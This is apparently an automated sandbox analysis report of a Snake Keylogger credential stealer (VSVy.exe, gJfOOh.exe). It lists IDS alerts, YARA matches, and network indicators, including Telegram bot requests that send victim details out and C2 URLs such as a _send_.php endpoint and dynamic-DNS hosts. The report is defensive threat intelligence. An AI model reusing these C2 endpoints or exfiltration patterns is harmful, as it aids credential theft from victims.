              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49859 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49904 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49890 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49865 -> 104.21.112.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49883 -> 104.21.112.1:443
              Source: global trafficTCP traffic: 192.168.2.5:49812 -> 50.116.88.120:587
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49727 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.5:49852 version: TLS 1.0
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2018/02/2025%20/%2021:37:00%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2018/02/2025%20/%2021:37:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: mail.gemssystems.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 02:37:02 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 02:37:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.000000000307F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
              Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002E73000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002E53000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.000000000308F000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.000000000307F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.gemssystems.com
              Source: VSVy.exe, 00000000.00000002.2243490956.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2433322042.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3899379184.0000000000425000.00000040.00000400.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3912014380.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3899379184.0000000000436000.00000040.00000400.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a
              Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3912014380.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3912014380.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3912014380.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: gJfOOh.exe, 00000010.00000002.3903689735.0000000003105000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003105000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enH
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002FAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: VSVy.exe, 00000000.00000002.2244413359.00000000041A5000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 0000000B.00000002.2436604449.0000000003951000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002FAE000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3899379679.0000000000435000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: gJfOOh.exe, 00000010.00000002.3903689735.0000000002FAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp, VSVy.exe, 0000000A.00000002.3902406589.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003023000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000002FDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3912014380.0000000003F83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: VSVy.exe, 0000000A.00000002.3909573216.0000000003D11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: gJfOOh.exe, 00000010.00000002.3903689735.0000000003136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002EB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
              Source: VSVy.exe, 0000000A.00000002.3902406589.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp, gJfOOh.exe, 00000010.00000002.3903689735.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49780 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49908 version: TLS 1.2

              System Summary

              barindex
              Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 10.2.VSVy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.gJfOOh.exe.3999390.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.gJfOOh.exe.3955570.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 11.2.gJfOOh.exe.3999390.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.VSVy.exe.447b420.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 11.2.gJfOOh.exe.3955570.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 0.2.VSVy.exe.43f3000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
